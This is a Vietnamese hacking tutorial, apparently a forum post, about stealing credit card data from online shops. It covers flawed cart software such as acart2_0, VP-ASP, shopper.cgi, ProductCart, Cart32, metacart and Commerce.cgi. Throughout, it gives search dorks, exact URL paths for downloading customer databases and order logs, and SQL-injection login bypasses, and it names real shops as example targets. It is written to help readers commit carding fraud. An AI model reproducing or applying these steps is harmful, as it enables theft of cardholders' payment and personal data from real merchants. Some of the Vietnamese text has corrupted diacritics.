Thường các hacker hack cc từ những lỗi nghiêm trọng của các site bán hàng trên tồn thế giới (cịn vơ số những site chưa fix )...các lỗi thường gặp là :
acart2_0
SalesCart Database Storage Insecurity Trong file shopper.cgi
Cart32 Sites VP-ASP ProductCar ...
Dưới đây là bài viết chi tiết cách hack các lỗi đĩ, tất nhiên cũng ko phải tui tìm ra được các lỗi này...vì các lỗi này đựoc tìm ra rất lâu rùi...được sang qua sang lại....đến nỗi tác giả của nĩ là ai cũng ko cịn nhớ nỗi nữa...!!!
--- Lỗi acart2_0" :
Đầu tiên các bạn vàohttp://google.com/ ( các bạn cĩ thể vào các site tìm kiếm khác nhưhttp://av.com/ .... ) search keyword "acart2_0" ,bạn thấy rất nhiều file mắc lỗi này,do kinh nghiệm mình khuyên các bạn nên chọn những site cĩ dạnghttp://url/acart2_0/ vắ dụ sitehttp://www.coolrob.com/cart/acart2_0 ,gõ thêm" /acart2_0.mdb "vào đằng sau url, enter xong bạn thấy màn hình dơnload là thành cơng rùi đĩ...bạn cĩ thể down tồn bộ file database *.mdb của shop bán hàng đĩ...
--- Lỗi VP-ASP:
đầu tiên vàohttp://google.com/ search từ khố "shopdisplaycategories" click vào site bạn sẽ thấy làhttp://www. sitename.com/shopping/shopdisplaycategories.asp
Việc tiếp theo là chuyển urlhttp://www.sitename.com/shopping/shopdisplaycategories.asp thành urlhttp://www. sitename.com/shopping/shopdbtest.asp nghĩa là thay shopdisplaycategories.asp bằng shopdbtest.asp rồi enter...nếu ra tiếp thêm một trang nữa...<---ko phảt là no page .thì bạn cĩ cơ hội down *mdb của site này đĩ...
sau khi ra trang mới xong,áp dụng cơng thức http:// [vp-asp site] / [ vp-asp dir] / [ xDatabase + .mdb ] -[vp-asp site] là :http://www.sitename.com/
-[ vp-asp dir] là :shopping
-[ xDatabase + .mdb ] sẽ là shopping.mdb
nếu cĩ màn hình save thì bạn thành cơng rùi đĩ...
--- Lỗi shopper.cgi:
vàohttp://google.com/ search từ khố shopper.cgi hoặc shopper.execopy những url cĩ dạng sitename.com/cgi-bin/ shopper.cgi?
sau đĩ paste vào browse và thêm dịng search=action&keywords=ccpower &template=shopper.conf hoặc hoặc thêm dịng search=action&keywords=ccpower &template=order1.log vào đằng sau,nếu may mắn bạn sẽ tìm thấy
cc--- Lỗi ProductCart: Search với từ khĩa allinurl: /productcart/
http://www.ackits.com/ProductCart/pc/msg.asp?
Xĩa tất cả từ sau ProductCart đi gữ lại đoạn nàyhttp://www.ackits.com/ProductCart/ sau đĩ thêm vào sau database/ EIPC.mdb sẽ thànhhttp://www.ackits.com/ProductCart/database/EIPC.mdbđến lúc này ta sẽ download được file .mdb về sau khi download về rùi thì chắc mọi người biết phải làm gì rồi chứ
... Lỗi Cart32.exe:
vào google.com ,search từ khĩa "Cart32.exe v3"đầu tiên vàohttp://www.sitename.com/cgi-bin/cart32.exe/sitename
Lấy Credit Cards :http://www.sitename.com/cgi-bin/cart32/sitename-ORDERS.txt
Hack CC thơng qua lỗi SalesCart Database Storage Insecurity:
Tổng quát: Lỗi này thực chất là dữ liệu của các chương trình mua bán khơng được bảo mật, mã hĩa hay cất giữ cẩn thận nên bạn hồn tồn cĩ thể lấy chúng một cách dễ dàng
Lưu ý: đơi khi với thực tế, 1 số link cĩ thể khác đi, khơng phải lúc nào cũng hồn tồn đúng, dữ liệu cĩ khi bao gồm cả
CRD (Credit Card) nên mọi việc phải qua proxy (nếu khơng cĩ proxy thì cĩ thể ra dịch vụ...) Khai thác: Hãy sử dụng 1 trong những link sau:
www.victim.com/fpdb/shop.mdb www.victim.com/shoponline/fpdb/shop.mdb www.victim.com/database/metacart.mdb www.victim.com/shopping/database/metacart.mdb www.victim.com/shop/database/metacart.mdb www.victim.com/metacart/database/metacart.mdb www.victim.com/mcartfree/database/metacart.mdb www.victim.com/ASP/cart/database/metacart.mdb
Vắ dụ: site84vn.com cĩ thể download cc từđây:www.84vn.com/database/metacart.mdb
Cĩ nghĩa là database khơng hề cĩ 1 chút bảo mật nào cả. Download vơ tư ! Trong database cĩ thể bao gồm: name, surname, address, e-mail, phone number, credit card number, company name...
Bạn cĩ thể khai thác dữ liệu này, nhưng trong thực tế, mọi việc khơng phải lúc nào cũng suơn sẻ cả, bạn hãy tưởng tượng mỗi server cĩ một cấu trúc riêng, vắ dụ nhưđường dẫn khơng phải lúc nào cũng là fpdb/... hay như những link trên, hãy tận dụng lỗi và thử từng cái một , nhiều khi làwww.victim.com/muaban/fpdb/shop.mdb vì vậy nếu bạn xài cách này hãy linh hoạt trong link tuỳ vào từng site! <----copy by h4a...
lên google tìm từ khĩa "inurl:commerce.cgi"
Rồi okie sốđịa chỉ online đang chờđĩn vd:
ta cĩ site
<http://www.warresisters.org/store/commerce.cgi>?
xĩa cái commerce.cgi? đi thay bằng Admin_files/commerce_user_lib.pl ta sẽđược
## This file contains the user specific variables ## necessary for Commerce.cgi
$sc_sales_tax = ".0825"; $sc_sales_tax_state = "NY"; $sc_send_order_to_email = "yes"; $sc_order_log_name = "onlinebookstore.log"; $sc_send_order_to_log = "yes"; $shipping_percentage = ".15"; $sc_order_email = "wrl\@igc.org"; $sc_root_url = "http://www.warresisters.org/store"; $sc_admin_email = "lit\@warresisters.org"; $sc_domain_name_for_cookie = ".warresisters.org"; $sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi"; $sc_root_web_path = "/home/serve/resist/Html/Products"; $sc_path_for_cookie = "/store"; $path_to_html = "../Html"; 1;
xĩa cái commerce_user_lib.pl đi thay bằng onlinebookstore.log (tìm ở $sc_order_log_name ) và .... Việc tiếp theo là thuộc về bạn
--- Vào google gõ từ khố tek9.aspta được link cĩ dạng tương tự như thế này
https://ionicpurifier.com/tek9.asp?pg=orders&mode=search
bắy đầu từ /tek9.asp/ gõ thêm /intranethttps://ionicpurifier.com/intranet/tek9.asp...ers&mode=search Sau đĩ đăng nhập với user và pass 'or''='nếu may mắn thì sẽ vào được , và ăn cc tha hồ
cịn rất nhiều site bị lỗi này
--- Search keyword in google.com.vn : " Shoping /admin "
http://shopping.richardhealey.com/admin_login.asp http://families-online.org/admin_login.asp
user/pass : ' or 1=1--
Code của site cho phép exploit lên SQL Server .
---